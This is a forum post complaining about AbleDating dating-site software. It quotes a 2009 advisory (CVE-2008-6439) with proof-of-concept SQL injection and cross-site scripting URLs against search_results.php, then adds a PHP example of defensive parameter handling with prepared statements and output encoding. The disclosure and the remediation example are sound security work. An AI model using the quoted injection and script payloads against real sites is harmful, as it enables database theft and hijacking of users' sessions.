Hi everyone.
I just found news that Abledating has a serious security issue in its software.
abledating 2.4 >> Sql injection and cross site scripting on search_results.php
SecurityAlert : 5377
CVE : CVE-2008-6439
CWE : CWE-79
SecurityRisk : Low
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Given : Yes
Credit : Ali Jasbi
Published : 10.03.2009
| abledating:abledating:2.4 |
“Advisory Text :
By : Ali Jasbi ( hackerz.ir security & hacking team)
vendor : abk-soft.com
product name : abledating 2.4
Exploits :
1- Sql injection :
bug :
http://abledating//search_results.php?p_age_from=18&p_age_to=18&keyword=
[sql
injection]&status=online&save_search=on&search_name=My%20search&photo=on
&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4
&search
test :
http://abledating/search_results.php?p_age_from=18&p_age_to=18&keyword=%
00′&status=online&save_search=on&search_name=My%20search&photo=on&p_orie
ntation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
2-Cross site scripting :
bug :
http://abledating/search_results.php?p_orientation%5B%5D=2&p_age_from=18
&p_age_to=18&p_relation%5B%5D=on&keyword=>’><ScRiPt%20%0a%0d>alert(42119
.7535489005)%3B</ScRiPt>&status=online&save_search=on&search_name=My%20s
earch&photo=on“
Well, you pay for abledating's crappy software, then abledating scams you, steals your money, rips you off, gives no support as it is promised, and in the end abledating software is insecure and has security holes. Great!
If I could do a search before the purchase of abledating software I would be lucky.
Feel free to share your opinion here.
Regards, B.
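For anyone maintaining a PHP search page like the one in the advisory, here is how the same parameters (`keyword`, `p_age_from`, `p_age_to`, `order`, `sort`) can be handled so that neither the `%00'` test nor markup in `keyword` has any effect. This is an added example, not code from the post, the advisory or AbleDating. The `profiles` table, its columns, the limits, the function names and the in-memory SQLite database are assumptions chosen so the script runs offline.

```php
<?php
// Added illustration, not AbleDating's code: schema, rows and limits are constructed.
declare(strict_types=1);

function search_profiles(PDO $db, array $q): array
{
    // Numeric parameters: validate type and range instead of trusting the URL.
    $range = ['options' => ['min_range' => 18, 'max_range' => 120]];
    $from = filter_var($q['p_age_from'] ?? null, FILTER_VALIDATE_INT, $range);
    $to = filter_var($q['p_age_to'] ?? null, FILTER_VALIDATE_INT, $range);
    $kw = $q['keyword'] ?? '';
    if ($from === false || $to === false || !is_string($kw)
        || strlen($kw) > 64 || strpos($kw, "\0") !== false) {
        throw new InvalidArgumentException('bad search parameters');
    }
    // Identifiers cannot be bound, so "order" and "sort" go through allow-lists.
    $order = $q['order'] ?? 'rating';
    if (!in_array($order, ['rating', 'age'], true)) { $order = 'rating'; }
    $dir = (($q['sort'] ?? 'desc') === 'asc') ? 'ASC' : 'DESC';
    // The keyword is bound as data; LIKE wildcards inside it are escaped first.
    $stmt = $db->prepare(
        "SELECT name, age FROM profiles WHERE age BETWEEN :a AND :b
         AND about LIKE :kw ESCAPE '\\' ORDER BY $order $dir"
    );
    $stmt->execute([':a' => $from, ':b' => $to,
                    ':kw' => '%' . addcslashes($kw, '%_\\') . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function render_results(string $kw, array $rows): string
{
    // Encode on output for the HTML context, quotes included.
    $e = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $html = '<h2>Results for "' . $e($kw) . '"</h2><ul>';
    foreach ($rows as $r) {
        $html .= '<li>' . $e($r['name']) . ', ' . (int) $r['age'] . '</li>';
    }
    return $html . '</ul>';
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE profiles (name TEXT, age INTEGER, rating REAL, about TEXT)');
$db->exec("INSERT INTO profiles VALUES ('ann', 18, 4.5, 'likes hiking'), ('bob', 18, 3.0, 'o''reilly fan')");
foreach (["o'reilly", "'><b>x</b>"] as $kw) {  // constructed keywords
    $q = ['p_age_from' => '18', 'p_age_to' => '18', 'keyword' => $kw];
    echo render_results($kw, search_profiles($db, $q)), "\n";
}
```

The first keyword matches the one row containing an apostrophe without altering the query, and the second is echoed back as inert text with no rows returned.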